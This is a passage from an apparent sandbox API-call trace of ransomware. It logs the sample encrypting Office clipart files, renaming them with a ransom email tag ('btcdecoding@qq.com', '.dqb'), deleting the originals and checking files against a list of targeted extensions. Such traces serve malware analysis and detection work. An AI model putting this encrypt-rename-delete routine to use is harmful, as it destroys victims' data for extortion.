SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0053.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0053.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0053.687] lstrlenW (lpString=".doc") returned 4 [0053.687] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.687] lstrlenW (lpString=".docx") returned 5 [0053.687] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.687] lstrlenW (lpString=".pdf") returned 4 [0053.687] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.687] lstrlenW (lpString=".xls") returned 4 [0053.687] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.687] lstrlenW (lpString=".xlsx") returned 5 [0053.687] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.687] lstrlenW (lpString=".ppt") returned 4 [0053.687] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0053.687] lstrlenW (lpString=".zip") returned 4 [0053.687] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.687] lstrlenW (lpString=".rar") returned 4 [0053.687] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.687] lstrlenW (lpString=".bz2") returned 4 [0053.688] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.688] lstrlenW (lpString=".7z") returned 3 [0053.688] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0053.688] lstrlenW (lpString=".dbf") returned 4 [0053.688] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0053.688] lstrlenW (lpString=".1cd") returned 4 [0053.688] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 63 [0053.688] lstrlenW (lpString=".jpg") returned 4 [0053.688] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.688] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=18304) returned 1 [0053.688] CloseHandle (hObject=0x218) returned 1 [0053.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 0x20 [0053.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.688] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.689] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.689] GetLastError () returned 0x0 [0053.689] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x4780, lpOverlapped=0x0) returned 1 [0053.691] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x4790, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x4790, lpOverlapped=0x0) returned 1 [0053.692] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.692] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.692] SetEndOfFile (hFile=0x234) returned 1 [0053.692] CloseHandle (hObject=0x234) returned 1 [0053.692] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.692] SetEndOfFile (hFile=0x218) returned 1 [0053.693] CloseHandle (hObject=0x218) returned 1 [0053.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf")) returned 1 [0053.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0053.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0053.693] lstrlenW (lpString=".doc") returned 4 [0053.693] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.693] lstrlenW (lpString=".docx") returned 5 [0053.693] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.693] lstrlenW (lpString=".pdf") returned 4 [0053.694] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.694] lstrlenW (lpString=".xls") returned 4 [0053.694] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.694] lstrlenW (lpString=".xlsx") returned 5 [0053.694] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.694] lstrlenW (lpString=".ppt") returned 4 [0053.694] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0053.694] lstrlenW (lpString=".zip") returned 4 [0053.694] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.694] lstrlenW (lpString=".rar") returned 4 [0053.694] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.694] lstrlenW (lpString=".bz2") returned 4 [0053.694] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.694] lstrlenW (lpString=".7z") returned 3 [0053.694] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0053.694] lstrlenW (lpString=".dbf") returned 4 [0053.694] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0053.694] lstrlenW (lpString=".1cd") returned 4 [0053.694] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 63 [0053.694] lstrlenW (lpString=".jpg") returned 4 [0053.694] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.694] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.694] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.695] GetLastError () returned 0x0 [0053.695] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x2b32, lpOverlapped=0x0) returned 1 [0053.696] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x2b40, lpOverlapped=0x0) returned 1 [0053.697] ReadFile (in: hFile=0x218, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0053.697] WriteFile (in: hFile=0x234, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.697] SetEndOfFile (hFile=0x234) returned 1 [0053.698] CloseHandle (hObject=0x234) returned 1 [0053.698] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0053.698] SetEndOfFile (hFile=0x218) returned 1 [0053.699] CloseHandle (hObject=0x218) returned 1 [0053.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0053.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0053.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0053.699] lstrlenW (lpString=".doc") returned 4 [0053.699] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.699] lstrlenW (lpString=".docx") returned 5 [0053.699] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.699] lstrlenW (lpString=".pdf") returned 4 [0053.699] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.699] lstrlenW (lpString=".xls") returned 4 [0053.699] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.699] lstrlenW (lpString=".xlsx") returned 5 [0053.699] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.699] lstrlenW (lpString=".ppt") returned 4 [0053.699] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0053.700] lstrlenW (lpString=".zip") returned 4 [0053.700] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.700] lstrlenW (lpString=".rar") returned 4 [0053.700] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString=".bz2") returned 4 [0053.700] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString=".7z") returned 3 [0053.700] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0053.700] lstrlenW (lpString=".dbf") returned 4 [0053.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0053.700] lstrlenW (lpString=".1cd") returned 4 [0053.700] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0053.700] lstrlenW (lpString=".jpg") returned 4 [0053.700] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.016] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.016] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.017] GetLastError () returned 0x0 [0055.017] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x30e8, lpOverlapped=0x0) returned 1 [0055.018] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x30f0, lpOverlapped=0x0) returned 1 [0055.019] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.019] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.019] SetEndOfFile (hFile=0x214) returned 1 [0055.019] CloseHandle (hObject=0x214) returned 1 [0055.020] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.020] SetEndOfFile (hFile=0x240) returned 1 [0055.020] CloseHandle (hObject=0x240) returned 1 [0055.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00008_.wmf")) returned 1 [0055.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0055.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0055.021] lstrlenW (lpString=".doc") returned 4 [0055.021] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.021] lstrlenW (lpString=".docx") returned 5 [0055.021] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.021] lstrlenW (lpString=".pdf") returned 4 [0055.021] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.021] lstrlenW (lpString=".xls") returned 4 [0055.021] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.021] lstrlenW (lpString=".xlsx") returned 5 [0055.021] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.021] lstrlenW (lpString=".ppt") returned 4 [0055.021] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0055.021] lstrlenW (lpString=".zip") returned 4 [0055.021] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.021] lstrlenW (lpString=".rar") returned 4 [0055.021] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.021] lstrlenW (lpString=".bz2") returned 4 [0055.021] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.021] lstrlenW (lpString=".7z") returned 3 [0055.022] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0055.022] lstrlenW (lpString=".dbf") returned 4 [0055.022] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0055.022] lstrlenW (lpString=".1cd") returned 4 [0055.022] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.022] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 63 [0055.022] lstrlenW (lpString=".jpg") returned 4 [0055.022] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.022] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.022] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.022] GetLastError () returned 0x0 [0055.022] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x27a2, lpOverlapped=0x0) returned 1 [0055.026] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x27b0, lpOverlapped=0x0) returned 1 [0055.027] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.027] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.027] SetEndOfFile (hFile=0x214) returned 1 [0055.027] CloseHandle (hObject=0x214) returned 1 [0055.027] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.027] SetEndOfFile (hFile=0x240) returned 1 [0055.028] CloseHandle (hObject=0x240) returned 1 [0055.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf")) returned 1 [0055.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0055.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0055.029] lstrlenW (lpString=".doc") returned 4 [0055.029] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.029] lstrlenW (lpString=".docx") returned 5 [0055.029] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.029] lstrlenW (lpString=".pdf") returned 4 [0055.029] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.029] lstrlenW (lpString=".xls") returned 4 [0055.029] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.029] lstrlenW (lpString=".xlsx") returned 5 [0055.029] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.029] lstrlenW (lpString=".ppt") returned 4 [0055.029] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0055.029] lstrlenW (lpString=".zip") returned 4 [0055.029] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.029] lstrlenW (lpString=".rar") returned 4 [0055.029] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.029] lstrlenW (lpString=".bz2") returned 4 [0055.030] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.030] lstrlenW (lpString=".7z") returned 3 [0055.030] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0055.030] lstrlenW (lpString=".dbf") returned 4 [0055.030] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0055.030] lstrlenW (lpString=".1cd") returned 4 [0055.030] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63 [0055.030] lstrlenW (lpString=".jpg") returned 4 [0055.030] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.030] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.030] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.030] GetLastError () returned 0x0 [0055.030] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x5b8, lpOverlapped=0x0) returned 1 [0055.032] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0055.033] ReadFile (in: hFile=0x240, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.033] WriteFile (in: hFile=0x214, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.033] SetEndOfFile (hFile=0x214) returned 1 [0055.033] CloseHandle (hObject=0x214) returned 1 [0055.033] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.033] SetEndOfFile (hFile=0x240) returned 1 [0055.034] CloseHandle (hObject=0x240) returned 1 [0055.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 1 [0055.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0055.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63 [0055.034] lstrlenW (lpString=".doc") returned 4 [0055.034] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.034] lstrlenW (lpString=".docx") returned 5 [0055.034] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.034] lstrlenW (lpString=".pdf") returned 4 [0055.034] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.034] lstrlenW (lpString=".xls") returned 4 [0055.034] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.034] lstrlenW (lpString=".xlsx") returned 5 [0055.034] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.035] lstrlenW (lpString=".ppt") returned 4 [0055.035] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.035] lstrlenW 